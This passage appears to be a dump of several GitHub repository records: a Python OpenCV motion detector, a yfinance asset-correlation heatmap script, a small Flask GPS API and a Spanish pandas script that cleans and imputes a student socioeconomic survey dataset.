adjusting etc..\n print \"Something is moving !\"\n if self.doRecord: #set isRecording=True only if we record a video\n self.isRecording = True\n else:\n if instant >= self.trigger_time +10: #Record during 10 seconds\n print \"Stop recording\"\n self.isRecording = False\n else:\n cv.PutText(curframe,datetime.now().strftime(\"%b %d, %H:%M:%S\"), (25,30),self.font, 0) #Put date on the frame\n cv.WriteFrame(self.writer, curframe) #Write the frame\n\n if self.show:\n cv.ShowImage(\"Image\", curframe)\n cv.ShowImage(\"Res\", self.res)\n\n cv.Copy(self.frame2gray, self.frame1gray)\n c=cv.WaitKey(1)\n if c==27 or c == 1048603: #Break if user enters 'Esc'.\n break\n\n def processImage(self, frame):\n cv.CvtColor(frame, self.frame2gray, cv.CV_RGB2GRAY)\n\n #Absdiff to get the difference between to the frames\n cv.AbsDiff(self.frame1gray, self.frame2gray, self.res)\n\n #Remove the noise and do the threshold\n cv.Smooth(self.res, self.res, cv.CV_BLUR, 5,5)\n element = cv.CreateStructuringElementEx(5*2+1, 5*2+1, 5, 5, cv.CV_SHAPE_RECT)\n cv.MorphologyEx(self.res, self.res, None, None, cv.CV_MOP_OPEN)\n cv.MorphologyEx(self.res, self.res, None, None, cv.CV_MOP_CLOSE)\n cv.Threshold(self.res, self.res, 10, 255, cv.CV_THRESH_BINARY_INV)\n\n def somethingHasMoved(self):\n nb=0 #Will hold the number of black pixels\n\n for y in range(self.height): #Iterate the hole image\n for x in range(self.width):\n if self.res[y,x] == 0.0: #If the pixel is black keep it\n nb += 1\n avg = (nb*100.0)/self.nb_pixels #Calculate the average of black pixel in the image\n #print \"Average: \",avg, \"%\\r\",\n if avg > self.ceil:#If over the ceil trigger the alarm\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n detect = MotionDetector(doRecord=False)\n detect.run()\n" }, { "alpha_fraction": 0.8285714387893677, "alphanum_fraction": 0.8285714387893677, "avg_line_length": 51.5, "blob_id": "b9b994b656b37bee49e463b417810e4293b24904", "content_id": "2da58775172431a3eba7deaec53b6af467178287", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 105, "license_type": "permissive", "max_line_length": 83, "num_lines": 2, "path": "/README.md", "repo_name": "matmss/pycomputervisionAI", "src_encoding": "UTF-8", "text": "# pycomputervisionAI\nA computer vision project using python to track movement, applying AI in the future\n" } ]
3
MatteoGaleone/Matrice-Correlazioni
https://github.com/MatteoGaleone/Matrice-Correlazioni
b3cc288a0113b0ad4a0886c2b7b9e4d5959ad10a
33ac5dfde0b312b3c860041b5440212a9a465142
292e21bbb61a90bbbcdbb723a0dc8c4c82f1e8bf
refs/heads/main
2023-06-08T01:02:03.195537
2021-07-05T13:59:06
2021-07-05T13:59:06
382,299,003
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5621033310890198, "alphanum_fraction": 0.5729827880859375, "avg_line_length": 27.28205108642578, "blob_id": "76cc38e56b759a4aabbd53a8b8df0fda9c759b93", "content_id": "e7fafcdb2f63bc803229f34496aa51d664b742ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1103, "license_type": "no_license", "max_line_length": 91, "num_lines": 39, "path": "/Correlazioni.py", "repo_name": "MatteoGaleone/Matrice-Correlazioni", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport yfinance as yf\n\ndef CalcolaMatrice(N):\n DF=pd.DataFrame()\n p=str(input('inserire i numero di periodi da considerare + y/mo/d, es: 5mo '))\n for i in range(1, N+1) :\n t=str(input(\"Inserire il ticker del prodotto: \"))\n Dataset= yf.Ticker(t)\n DF[t]=Dataset.history(period=p)['Close']\n return DF\n\ndef Programma():\n while True:\n N=int(input('Numero di asset da confrontare: '))\n DF=CalcolaMatrice(N)\n plt.figure(figsize=(10,8), dpi=150)\n sns.heatmap(DF.corr(), cmap='RdYlGn', linecolor='black', linewidth=0.1, annot=True)\n return plt.show()\n plt.clf()\n while True:\n risposta = str(input('Vuoi visualizzare una nuova matrice? (si/no): '))\n if risposta in ('si', 'no'):\n break\n print('Input non valido.')\n if risposta == 'si':\n continue\n else:\n print('Ciao')\n break\n\nProgramma()\n" } ]
1
lvillatoroq/apis
https://github.com/lvillatoroq/apis
6e506ccb4cad4f0ad888f2e0b739f27233be4181
1016393855033a5e8bfbba34c9d44ff4da6cbae2
cb989cb62442ecc855eea24445c434980f890d4c
refs/heads/master
2021-01-10T07:43:33.553262
2016-04-05T13:03:56
2016-04-05T13:03:56
55,508,218
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 20, "blob_id": "6f7026ca944d11d0ce9b62151ce7a46c631257ea", "content_id": "f98aa36eada2b111b8970e0ea2c81747ecb8481b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 34, "num_lines": 2, "path": "/README.md", "repo_name": "lvillatoroq/apis", "src_encoding": "UTF-8", "text": "# apis\nAPI created for different projects\n" }, { "alpha_fraction": 0.4854070544242859, "alphanum_fraction": 0.4992319643497467, "avg_line_length": 33.26315689086914, "blob_id": "1fdb981bb1620235d713ae4d264373ba61b0ac51", "content_id": "6e137709c6bd00cb1dce920f1f4e3e0d8e4dce29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 651, "license_type": "no_license", "max_line_length": 106, "num_lines": 19, "path": "/gps_api.py", "repo_name": "lvillatoroq/apis", "src_encoding": "UTF-8", "text": "from flask import Flask, jsonify\nimport gps\n\napp = Flask(__name__)\n\[email protected]('/gps/api/v1/location', methods=['GET'])\ndef get_gps():\n session = gps.gps(\"localhost\", \"2947\")\n session.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)\n while True:\n report = session.next()\n if report['class'] == 'TPV':\n if hasattr(report, 'time'):\n return jsonify(clock=report.time,longitude=report.lon,latitude=report.lat)\n #session.close()\n break\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" } ]
2
DataMiningUCV/preprocesamiento-de-datos-josseline06
https://github.com/DataMiningUCV/preprocesamiento-de-datos-josseline06
80efea7065d21643121d7782d4b1c2e1145fe2f8
a264e402edf584be0a3e4dcf8e68eebbb20a12bf
4666c5ea08f3919147158f0024e6cfa493064e8f
refs/heads/master
2021-01-10T18:01:40.464736
2016-01-18T07:04:15
2016-01-18T07:04:15
48,598,043
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6797794103622437, "alphanum_fraction": 0.7027015089988708, "avg_line_length": 40.744606018066406, "blob_id": "41b519ceae40790ac3d417f6f405748393a8d6f3", "content_id": "bcb3c4dffa220bbce43cb3863f5b2ccc5e01ca88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23399, "license_type": "no_license", "max_line_length": 306, "num_lines": 556, "path": "/src/preprocessed.py", "repo_name": "DataMiningUCV/preprocesamiento-de-datos-josseline06", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom datetime import date\nimport re, os, numpy, pandas\n\n\"\"\"\n --- Cargando datos ---\n * El proyecto debe correrse desde el directorio base\n * output_data almacena la data luego del procesamiento\n \n\"\"\"\nproject = os.getcwd()\ninput_data = pandas.read_csv(project+'/dat/data.csv', header=None, skiprows=1)\noutput_data = pandas.DataFrame(\n\tcolumns=['ID', 'PeriodY', 'PeriodN', 'Age', 'Birthday', 'CivilStatus', 'Gender', 'School', 'AdmissionY', 'AdmissionM', \n\t'Average', 'Efficiency', 'Semester', 'Enrolled', 'Approved', 'Withdrawals', 'Failed', 'ReasonOfFailed', 'Subjects',\n\t'EnrollThesis', 'Origin', 'Residence', 'Roommates', 'ChangeAddress', 'HousingType', 'Breadwinner', 'FamilyLoad', \n\t'BreadwinnerIncome', 'BreadwinnerOthersIncomes', 'BreadwinnerTotalIncome', 'BreadwinnerFood', 'BreadwinnerTransportation', \n\t'BreadwinnerMedical', 'BreadwinnerDental', 'BreadwinnerStudy', 'Services', 'Condominium', 'BreadwinnerOtherExpenses', \n\t'BreadwinnerTotalExpenses', 'FinancialAid', 'Work', 'Scolarship', 'InputBreadwinner', 'Family', 'InputWork', 'TotalIncome', \n\t'Food', 'Transportation', 'Medical', 'Dental', 'Personal', 'Rental', 'AuxRentalColumn','Study', 'Entertainment', \n\t'OtherExpenses', 'TotalExpenses', 'Rating']\n\t)\n\n\"\"\"\n --- Cédula ---\n * El identificador de c/u de las instancias\n \n\"\"\"\noutput_data.ID = input_data[2].drop_duplicates()\n\n\"\"\"\n --- Período académico ---\n 1. Eliminando separadores entre número de período y año (pueden der espacio, '-', '/' y '\\')\n 2. Separando período (que se compone de año y número) en las columnas PeriodY y PeriodoN respectivamente\n\t2.1. Tomando los períodos que cumplan con el formato <número><año> \n\t2.2. Tomando los períodos que cumplan con el formato <año><número>\n\t2.3. Juntando (2) y (3) en un mismo dataframe\n 3. Transformación de la columna PeriodN\n 4. Transformación de la columna PeriodY\n 5. Inputación de datos erróneos o faltantes con la moda\n\t\n\"\"\" \n# Paso 1\nperiod_messy = input_data[1].str.replace('[\\s\\\\\\\\\\-\\/]','') \n\n# Paso 2.1: extrae en los grupos year y number (c/u en distintas columnas) las cadenas con de forma <año><número>\nperiod = period_messy.str.extract('^(?P<year>(?:20)?\\d{2})(?P<number>pri(?:mero)?|seg(?:undo)?|ii?|0?[12]s?)$', re.I)\n\n# Paso 2.2: extrae en los grupos year y number (c/u en distintas columnas) las cadenas con de forma <número><año>\nperiod_p2 = period_messy.str.extract('^(?P<number>pri(?:mero)?|seg(?:undo)?|ii?|0?[12]s?)(?P<year>(?:20)?\\d{2})$', re.I)\n\n# Paso 2.3: Se juntan en un mismo data frame los posibles casos (intersección es nula por lo que no hay pérdida de datos)\nperiod.update(period_p2)\n\n# Paso 3: Transformación de los números de período a enteros {1,2}\noutput_data.PeriodN = period.number.str.lower().replace([r'pri(mero)?|i|0?1s|01s?', r'seg(undo)?|ii|0?2s|02s?'], [1,2], regex=True)\n\n# Paso 4: Transformación de los años, todos con 4 dígitos\n# Se decide imputar el valor de los años expresado en 2 dígitos en el siglo XXI dado que el dataset no muestra ningún registro\n# de que los valores puedan estar en alguna otra época \noutput_data.PeriodY = period.year.str.replace('^\\d{2}$', lambda x: '20'+x.group(0))\n\n# Paso 5\noutput_data.PeriodN = output_data.PeriodN.fillna(output_data.PeriodN.mode().iloc[0])\noutput_data.PeriodY = output_data.PeriodY.fillna(output_data.PeriodY.mode().iloc[0]).astype('int')\n\n\"\"\"\n --- Edad ---\n 1. Casteo de la edad a entero\n\t\n\"\"\"\noutput_data.Age = input_data[4].str.replace('^(\\d{1,2})[^0-9]+', lambda x: x.group(1)).astype('int')\n\n\"\"\"\n --- Fecha de nacimiento ---\n 1. Transformación de la fecha a años con 4 dígitos\n 2. Transformación de la fecha a formato yyyy-mm-dd\n 3. Inputar datos erróneos o faltantes con el (año del período académico - edad)\n\t\n\"\"\"\ncurrent_year = date.today().strftime('%y')\n\n# Paso 1: función lambda evalua si 2 digitos de año > año actual => el año es del siglo XX sino el año es del siglo XXI\noutput_data.Birthday = input_data[3].str.replace('^\\d{1,2}[\\s/-]?\\d{1,2}[\\s/-]?\\d{2}$', lambda x: ['%s19%s'%(b,a) if a>current_year else '%s20%s'%(b,a) for b in [x.group(0)[:-2]] for a in [x.group(0)[-2:]]][0])\n\n# Paso 2\noutput_data.Birthday = pandas.to_datetime(output_data.Birthday, dayfirst=True, errors='coerce')\n\n# Paso 3\noutput_data.Birthday = output_data.apply(lambda x: pandas.to_datetime('%d/01/01' % (x.PeriodY-x.Age)) if pandas.isnull(x.Birthday) else x.Birthday, axis=1)\n\n\"\"\"\n --- Estado civil ---\n 1. Limpiar series, en el que los valores posibles serán {soltero(a), casado(a), viudo(a)}\n 2. Codificar las categorías {soltero: 0, casado: 1, viudo: 2}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.CivilStatus = input_data[5].str.lower().replace([r'^soltero.*', r'^casado.*', r'^viudo.*', r'.*'], [0, 1, 2, numpy.nan], regex=True)\n\n# Paso 3\noutput_data.CivilStatus = output_data.CivilStatus.fillna(output_data.CivilStatus.mode().iloc[0])\n\n\"\"\"\n --- Sexo ---\n 1. Limpiar series, en el que los valores posibles serán {femenino, masculino}\n 2. Codificar las categorías {femenino: 0, masculino: 1}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.Gender = input_data[6].str.lower().replace([r'^f(?:emenino)?', r'^m(?:asculino)?', r'.*'], [0, 1, numpy.nan] , regex=True)\n\n# Paso 3\noutput_data.Gender = output_data.Gender.fillna(output_data.Gender.mode().iloc[0])\n\n\"\"\"\n --- Escuela ---\n 1. Limpiar series, en el que los valores posibles serán {enfermería, bioanálisis}\n 2. Codificar las categorías {enfermería: 0, bioanálisis: 1}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.School = input_data[7].str.lower().replace(['enfermería', 'bioanálisis', r'.*'], [0, 1, numpy.nan], regex=True)\n\n# Paso 3\noutput_data.School = output_data.School.fillna(output_data.School.mode().iloc[0])\n\n\"\"\"\n --- Año de ingreso ---\n 1. En caso de años con 2 dígitos, llevarlos a 4\n\t\n\"\"\"\noutput_data.AdmissionY = input_data[8].apply(lambda x: x if x>=1900 else (x+1900 if x>int(current_year) else x+2000))\n\n\"\"\"\n --- Modalidad de ingreso ---\n 1. Limpiar series, en el que los valores posibles serán {interinstitucionales, prueba interna, internos, opsu}\n 2. Codificar las categorías {interinstitucionales: 0, prueba interna: 1, internos: 2, opsu: 3}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.AdmissionM = input_data[9].str.replace('\\s','').str.lower()\noutput_data.AdmissionM = output_data.AdmissionM.replace([r'.*interinstitucional(es)?.*', r'^pruebainterna.*', r'^internos.*', r'.*opsu.*', r'.*'], [0, 1, 2, 3, numpy.nan], regex=True)\n\n# Paso 3\noutput_data.AdmissionM = output_data.AdmissionM.fillna(output_data.AdmissionM.mode().iloc[0])\n\n\"\"\"\n --- Promedio ponderado ---\n 1. Limpiar series, en el que los valores posibles serán entre {0, 20}\n 2. Imputar datos erróneos o faltantes con la media\n\t\n\"\"\"\n# Paso 1\noutput_data.Average = input_data[17].apply(lambda x: float(x) if x>=0 and x<=20 else (float(x)/1000.0 if x>=1000 and x<=20000 else numpy.nan))\n\n# Paso 2\noutput_data.Average = output_data.Average.fillna(output_data.Average.mean())\n\n\"\"\"\n --- Eficiencia ---\n 1. Limpiar series, en el que los valores posibles serán entre {0, 1}\n 2. Imputar datos erróneos o faltantes con la media\n\t\n\"\"\"\n# Paso 1\noutput_data.Efficiency = input_data[18].apply(lambda x: float(x) if x>=0 and x<=1 else (float(x)/10000.0 if x>=1000 and x<=10000 else numpy.nan))\n\n# Paso 2\noutput_data.Efficiency = output_data.Efficiency.fillna(output_data.Efficiency.mean())\n\n\"\"\"\n --- Semestre ---\n 1. Limpiar series, en el que los valores posibles sean numéricos y entre {1,10}\n 2. Imputar datos erróneos con la moda\n\t\n\"\"\"\n# Paso 1 \noutput_data.Semester = input_data[10].str.replace('^(\\d{1,2}).*', lambda x: x.group(1)).astype('int')\noutput_data.Semester = output_data.Semester.apply(lambda x: x if x>0 and x<=10 else numpy.nan)\n\n# Paso 2\noutput_data.Semester = output_data.Semester.fillna(output_data.Semester.mode().iloc[0])\n\n\"\"\"\n --- Materias inscritas, aprobadas, retiradas y reprobadas del semestre anterior ---\n 1. Limpiar series, en el que los valores posibles sean numéricos\n 2. Imputar datos erróneos de acuerdo a que cumpla que materias inscritas = materias aprobadas + materias retiradas + materias reprobadas\n\t\n\"\"\"\n# Paso 1\noutput_data.Enrolled = input_data[13]\noutput_data.Approved = input_data[14].str.extract('^(\\d{1,2})$').astype('float')\noutput_data.Withdrawals = input_data[15]\noutput_data.Failed = input_data[16]\noutput_data.ReasonOfFailed = input_data[19]\n\n# Paso 2: hipótesis planteada: La columna inscritos esta correcta\n# Descartando personas con eficiencia 1 y además quienes no tienen razón de reprobar\n# Se asume como pre-condición que es un requisito obligatorio para quienes reprobaron\n# materias expresar un motivo\noutput_data.Failed = output_data.apply(lambda x: 0 if x.Efficiency == 1.0 else (0 if pandas.isnull(x.ReasonOfFailed) else x.Failed), axis=1)\n\n# Recuperar valores perdidos en aprobadas\noutput_data.Approved = output_data.apply(lambda x: x.Enrolled-x.Failed-x.Withdrawals if pandas.isnull(x.Approved) else x.Approved, axis=1)\n\n# Dado que la proporción de estudiantes con materias retiradas es baja, se asume\n# que si retiradas > inscritas-aprobadas-reprobadas => 0\noutput_data.Withdrawals = output_data.apply(lambda x: 0 if x.Withdrawals > (x.Enrolled-x.Failed-x.Approved) else x.Withdrawals, axis=1)\n\n# Casos en que el error se encuentra en la columna aprobadas\noutput_data.Approved = output_data.apply(lambda x: x.Enrolled-x.Failed-x.Withdrawals if x.Enrolled != (x.Approved+x.Withdrawals+x.Failed) else x.Approved, axis=1)\n\n# Si eficiencia 1 => No hay razones de reprobar\noutput_data.ReasonOfFailed = output_data.apply(lambda x: None if x.Efficiency == 1.0 else x.ReasonOfFailed, axis=1)\n\n\"\"\"\n --- Materias inscritas en el semestre en curso ---\n * Data limpia, por lo que no se aplica ningún proceso\n\t\n\"\"\"\noutput_data.Subjects = input_data[20] \n\n\"\"\"\n --- Cantidad de veces en que inscribió Trabajo Especial/Pasantías de Grado ---\n 1. Unir columnas (21) y (22) de input_data\n 2. Codificar las categorías (No := 0, Si => ('1 vez' := 1, '2 veces' := 2, 'más de 2' := 3) )\n 3. Valores inconsistentes entre (21) y (22) se le imputará 0 dado que todos los casos en que ocurre son estudiantes de semestres bajos\n\n\"\"\"\n# Paso 1 y 2\nenrolled = input_data[21].replace(['Si', 'No'], [True, False]) \namounts = input_data[22].replace([r'^Primera.+', r'^Segunda.+', r'^Más.+', r'.*)'], [1,2,3,numpy.nan], regex=True)\nenrolled_thesis = pandas.DataFrame({'enrolled': enrolled, 'amounts': amounts})\n\n# Paso 3\noutput_data.EnrolledThesis = enrolled_thesis.apply(lambda x: x.amounts if pandas.isnull(x.amounts)==False and x.enrolled else 0, axis=1)\n\n\"\"\"\n --- Procedencia ---\n 1. Codificar las categorías (todos representarán estados)\n\n\"\"\"\noutput_data.Origin = input_data[23].replace([r'.+Libertador.*',r'(.+Sucre|.*(Baruta|Hatillo|Chacao|Altos|Guarenas|Valles)).*',r'Ara.*',r'Apu.*',r'Tác.*',r'Var.*',r'Mon.*',r'Por.*',r'Nue*.',r'Tru*.',r'Lar.*',r'Bol.*',r'Bar.*',r'Suc.*',r'Anz.*',r'Mér.*',r'Delta.*',r'Yar.*',r'Guár.*'], range(19), regex=True)\n\n\"\"\"\n --- Residencia ---\n 1. Codificar las categorías (todos representarán zonas de Dtto Capital y el Edo. Miranda)\n 2. A los valores faltantes, se imputa la moda\n\n\"\"\"\n\noutput_data.Residence = input_data[24].replace([r'.+Libertador.*',r'.*Sucre.*',r'.*Baruta.*',r'.*Hatillo.*',r'.*Chacao.*',r'.*Altos.*',r'.*Guarenas.*',r'.*Valles.*'], range(8), regex=True)\noutput_data.Residence = output_data.Residence.fillna(output_data.Residence.mode().iloc[0])\n\n\"\"\"\n --- Compañeros de habitación ---\n 1. Codificar las categorías \n valores posibles {padres, esposo o hijo, madre, padre, familiares maternos, familiares paternos, solo, otros}\n\n\"\"\"\noutput_data.Roommates = input_data[25].str.lower().str.replace('\\s', '')\noutput_data.Roommates = output_data.Roommates.replace([r'.*padres.*',r'.*(esposo(?<!su)|hijo).*',r'.*(mamá|madre).*',r'.*(papá|padre).*',r'.+maternos.*',r'.+paternos.*',r'sol[oa]',r'.+'], range(8), regex=True)\n\n\"\"\"\n --- Cambio de dirección ---\n 1. Codificar las categorías, valores posibles {si, no}\n\n\"\"\"\noutput_data.ChangeAddress = input_data[11].replace(['No', 'Si'], [0, 1])\n\n\"\"\"\n --- Tipo de vivienda ---\n 1. Codificar las categorías\n \tvalores posibles {quinta, edific, urbano, rural, alquilada, vecindad, estudiantil, otros}\n\n\"\"\"\noutput_data.HousingType = input_data[26].str.lower().replace([r'.*quinta.*',r'.*edific.*',r'.*urbano.*',r'.*rural.*',r'.*alquilada.*',r'.*vecindad.*',r'.*estudiantil.*', r'.*'],range(8),regex=True)\n\n\"\"\"\n --- Responsable económico ---\n 1. Codificar las categorías\n \tvalores posibles {padres, madre, padre, cónyugue, usted, familiares, otros}\n\n\"\"\"\noutput_data.Breadwinner = input_data[49].str.lower()\noutput_data.Breadwinner = output_data.Breadwinner.replace([r'.*padres.*',r'.*madre.*',r'.*padre.*',r'.*(cónyugue|esposo).*',r'.*(usted|ninguno).*',r'.*(familiares|abuel[oa]|herman[oa]|ti[oa]).*',r'.*'], range(7), regex=True)\n\n\"\"\"\n --- Carga familiar del responsable económico ---\n * Data limpia, por lo que no se aplica ningún proceso\n\n\"\"\"\noutput_data.FamilyLoad = input_data[50]\n\n\"\"\"\n --- Ingreso del responsable económico ---\n 1. Limpiar data, eliminando todos los caracteres que no sean numéricos y agregando '.' en las ','\n 2. Imputar en las entradas vacias 0\n\n\"\"\"\noutput_data.BreadwinnerIncome = input_data[51].str.replace(',','.').str.replace('[a-zA-Z\\s]','')\noutput_data.BreadwinnerIncome = output_data.BreadwinnerIncome.apply(lambda x: x.replace('.','',1) if x.count('.')>1 else x).astype('float')\n\n\"\"\"\n --- Otros ingresos del responsable económico ---\n 1. Limpiar data, eliminando todos los caracteres que no sean numéricos\n 2. Imputar en las entradas vacias 0\n\n\"\"\"\noutput_data.BreadwinnerOthersIncomes = input_data[52].str.replace('[a-zA-Z\\s]','').str.extract('^(\\d+\\.?\\d*)+$').astype('float')\noutput_data.BreadwinnerOthersIncomes = output_data.BreadwinnerOthersIncomes.fillna(0)\n\n\"\"\"\n --- Ingresos totales del responsable económico ---\n 1. Suma de columnas de ingresos del responsable (ingresos + otros)\n\n\"\"\"\noutput_data.BreadwinnerTotalIncome = output_data.apply(lambda x: x.BreadwinnerIncome+x.BreadwinnerOthersIncomes, axis=1)\n\n\"\"\"\n --- Gastos de alimentación del responsable económico ---\n 1. Limpiar columna, de modo de que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerFood = input_data[55].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerFood = output_data.BreadwinnerFood.fillna(output_data.BreadwinnerFood.mode().iloc[0])\n\n\"\"\"\n --- Gastos de transporte público del responsable económico ---\n 1. Limpiar columna, de modo de que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerTransportation = input_data[56].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerTransportation = output_data.BreadwinnerTransportation.fillna(output_data.BreadwinnerTransportation.mode().iloc[0])\n\n\"\"\"\n --- Gastos médicos del responsable económico ---\n 1. Limpiar columna, de modo de que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerMedical = input_data[57].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerMedical = output_data.BreadwinnerMedical.fillna(output_data.BreadwinnerMedical.mode().iloc[0])\n\n\"\"\"\n --- Gastos odontológicos del responsable económico ---\n 1. Limpiar columna, de modo de que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerDental = input_data[58].str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerDental = output_data.BreadwinnerDental.fillna(output_data.BreadwinnerDental.mode().iloc[0])\n\n\"\"\"\n --- Gastos educativos del responsable económico ---\n 1. Imputar con 0\n\n\"\"\"\noutput_data.BreadwinnerStudy = input_data[59].fillna(0)\n\n\"\"\"\n --- Gastos en servicios del responsable económico ---\n 1. Limpiar columna, de modo de que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.Services = input_data[60].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.Services = output_data.Services.fillna(output_data.Services.mode().iloc[0])\n\n\"\"\"\n --- Gastos en condominio del responsable económico ---\n 1. Limpiar columna, de modo de que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.Condominium = input_data[61].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.Condominium = output_data.Condominium.fillna(output_data.Condominium.mode().iloc[0])\n\n\"\"\"\n --- Otros gastos del responsable económico ---\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerOtherExpenses = input_data[62].fillna(input_data[62].mode().iloc[0])\n\n\"\"\"\n --- Total de egresos del responsable económico ---\n 1. Suma de columnas de gastos (alimentación+transporte+médicos+odontológico+estudio+servicios+condominio+otros)\n \n\"\"\"\noutput_data.BreadwinnerTotalExpenses = output_data.apply(lambda x: x.BreadwinnerFood+x.BreadwinnerTransportation+x.BreadwinnerMedical+x.BreadwinnerDental+x.BreadwinnerStudy+x.Services+x.Condominium+x.BreadwinnerOtherExpenses, axis=1)\n\n\"\"\"\n --- Solicitud de ayuda financiera a la universidad ---\n 1. Codificar las categorías, valores posibles {no, si}\n\n\"\"\"\noutput_data.FinancialAid = input_data[30].replace(['No', 'Si'], [0, 1])\n\n\"\"\"\n --- Actividad generadora de ingresos ---\n 1. Codificar las categorías, valores posibles {no, si}\n\n\"\"\"\noutput_data.Work = input_data[32].replace(['No', 'Si'], [0, 1])\n\n\"\"\"\n --- Monto de la beca ---\n 1. Corrigiendo valores a modo que tenga 4 dígitos, cuyos valores posibles serán {1500, 2000} \n\n\"\"\"\noutput_data.Scolarship = input_data[34].apply(lambda x: x*10 if x<1000 else(x/10 if x>9999 else x))\noutput_data.Scolarship = output_data.Scolarship.apply(lambda x: 1500 if x<=1500 else 2000)\n\n\"\"\"\n --- Aporte de responsable económico ---\n 1. Imputar valores faltantes con 0\n\n\"\"\"\noutput_data.InputBreadwinner = input_data[35].fillna(0)\n\n\"\"\"\n --- Aporte de familiares y amigos ---\n 1. Imputar valores faltantes con 0\n\n\"\"\"\noutput_data.Family = input_data[36].fillna(0)\n\n\"\"\"\n --- Aporte por trabajo ---\n 1. Imputar valores faltantes con 0\n\n\"\"\"\noutput_data.InputWork = input_data[37].fillna(0)\n\n\"\"\"\n --- Ingresos totales ---\n 1. Suma de columnas de aportes (responsable económico + familiares y amigos + trabajo)\n\n\"\"\"\noutput_data.TotalIncome = output_data.apply(lambda x: x.Scolarship+x.InputBreadwinner+x.Family+x.InputWork, axis=1)\n\n\"\"\"\n --- Gastos de alimentación ---\n 1. Llenar valores faltantes con la moda, dado que es poco probable que no haya gastos en alimentación\n\n\"\"\"\noutput_data.Food = input_data[39].fillna(input_data[39].mode().iloc[0])\n\n\"\"\"\n --- Gastos en transporte público ---\n 1. Llenar valores faltantes con la moda, dado que es poco probable que no haya gastos en transporte\n\n\"\"\"\noutput_data.Transportation = input_data[40].fillna(input_data[40].mode().iloc[0])\n\n\"\"\"\n --- Gastos médicos ---\n 1. Llenar valores faltantes con 0\n\n\"\"\"\noutput_data.Medical = input_data[41].fillna(0)\n\n\"\"\"\n --- Gastos odontológicos ---\n 1. Llenar valores faltantes con 0\n\n\"\"\"\noutput_data.Dental = input_data[42].fillna(0)\n\n\"\"\"\n --- Gastos personales ---\n 1. Llenar valores faltantes con la moda, dado que es poco probable que no haya gastos personales\n\n\"\"\"\noutput_data.Personal = input_data[43].fillna(input_data[43].mode().iloc[0])\n\n\"\"\"\n --- Gastos en alquiler ---\n 1. Filtrar personas con vivienda alquilada o residencia estudiantil\n 2. Almacenar temporalmente en el dataset la columna 27 (precio de alquiler)\n 3. Para personas que con tipo de vivienda distinto a vivienda alquilada o residencia estudiantil imputar con 0,\n Para los casos de valores nulos o 0 en personas con alquiler, asignar valor de columna 27\n Sino, dejar el valor de de la columna Rental\n 4. Imputar con la moda en los casos que en ambas columnas esten sin valor\n\n\"\"\"\n# Paso 1\noutput_data.Rental = input_data[44]\n# Paso 2\noutput_data.AuxRentalColumn = input_data[27].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\n# Paso 3\noutput_data.Rental = output_data.apply(lambda x: 0 if x.HousingType!=6 and x.HousingType!=4 else (x.AuxRentalColumn if pandas.isnull(x.Rental) or x.Rental<=0 else x.Rental), axis=1)\n# Paso 4\noutput_data.Rental = output_data.Rental.fillna(output_data.Rental.mode().iloc[0])\n\n\"\"\"\n --- Gastos en material de estudio ---\n * Columna limpia, por lo que no se aplica ningún proceso\n \n\"\"\"\noutput_data.Study = input_data[45]\n\n\"\"\"\n --- Gastos en recreación ---\n 1. Llenar valores faltantes con la moda\n \n\"\"\"\noutput_data.Entertainment = input_data[46].fillna(input_data[46].mode().iloc[0])\n\n\"\"\"\n --- Otros gastos ---\n 1. Llenar valores faltantes con la moda\n \n\"\"\"\noutput_data.OtherExpenses = input_data[47].fillna(input_data[47].mode().iloc[0])\n\n\"\"\"\n --- Total de egresos ---\n 1. Suma de columnas de gastos 